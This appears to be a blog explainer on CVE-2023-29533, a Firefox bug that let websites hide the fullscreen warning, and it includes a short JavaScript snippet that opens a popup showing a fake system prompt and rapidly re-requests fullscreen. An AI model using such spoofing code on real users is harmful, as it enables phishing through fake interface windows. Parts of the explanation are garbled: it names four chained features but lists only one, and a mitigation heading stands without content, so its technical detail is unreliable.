CVE-2023-29533 - How Hackers Could Trick Users by Hiding Fullscreen Warnings in Older Firefox

In early 2023, security researchers found a tricky vulnerability in multiple Mozilla products, tracked as CVE-2023-29533. This bug allowed malicious websites to hide the built-in fullscreen notification using some clever JavaScript tricks. Let’s break down how this worked, show a simple attack snippet, and discuss what this meant for users.

What Is a Fullscreen Notification and Why Does It Matter?

When a website requests fullscreen mode in browsers like Firefox, a warning bar appears at the top of the screen. This notifies users that a site has gone fullscreen, mainly to prevent "spoofing" — where a website pretends to be something it isn’t (like a fake banking site or a system dialog).

If sites could hide or mess with this notification, they could more easily trick users.

How Does the Exploit Work?

Mozilla’s security team discovered that a combination of four browser features could be strung together to trick the browser interface:

setInterval: Repeatedly call code to keep up the attack

By using these together, attackers could repeatedly move between windows and fullscreen mode, temporarily obscuring or hiding the warning bar.

The attacker opens a new window that quickly requests fullscreen.

- Fast JavaScript “loops” focus back and forth and change the window’s name/ID, confusing the browser.
- At just the right moments, the fullscreen notification bar can be hidden or “covered,” making it seem like you’re not in fullscreen — but you are.

Here’s a simplified exploit snippet (do not use maliciously!)

// Trick to obscure fullscreen notification on Firefox <112

function spoofFullscreen() {
  let popup = window.open('', 'full', 'width=600,height=400');

  popup.document.body.innerHTML = '<h1>This Could Be a Fake System Prompt!</h1>';
  popup.window.name = 'truename';

  // Loop rapidly to keep things in fullscreen and shift focus
  let spoofInterval = setInterval(() => {
    try {
      popup.focus();
      popup.document.documentElement.requestFullscreen();
      popup.window.name = Math.random().toString(36);
    } catch(e) {
      clearInterval(spoofInterval);
    }
  }, 100);

  // This can obscure the fullscreen notification bar
}

spoofFullscreen();

What users would see:
A window that looks like a system alert, a login screen, or any fake UI — with little sign they’re in fullscreen mode.

Preventing quick window switching from hiding warning bars

See the official security advisory:  
- Mozilla Foundation Security Advisory 2023-18
- NIST NVD entry for CVE-2023-29533
- Mozilla Bugzilla bug 1827666

Conclusion

CVE-2023-29533 shows how complicated browser security can be. Even features meant for safety (fullscreen warnings) can be bypassed using old tricks and timing attacks. Keeping your software up to date is the best defense. Remember: if something on the web looks and feels a little too much like a real app or system window, it might not be what it seems.

Stay safe, stay updated!

*Exclusive content. Please do not reproduce without credit.*

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/21/2023 15:33:00 UTC